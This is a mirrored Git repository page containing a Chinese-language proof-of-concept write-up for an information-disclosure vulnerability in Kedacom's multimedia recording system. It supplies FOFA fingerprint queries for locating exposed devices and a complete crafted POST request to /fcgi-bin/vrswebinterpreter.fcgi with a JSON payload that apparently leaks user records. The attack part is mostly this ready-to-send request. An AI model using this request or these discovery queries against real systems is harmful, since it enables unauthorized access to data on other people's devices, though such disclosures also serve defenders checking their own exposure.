crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:54:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

1.4 KiB
Raw Blame History

苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

一、漏洞简介

苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞

二、影响版本

多媒体录播系统

三、资产测绘

  • fofabody="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"
  • 特征

1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png

四、漏洞复现

POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 333

{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}

1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png

更新: 2024-11-27 10:00:05
原文: https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl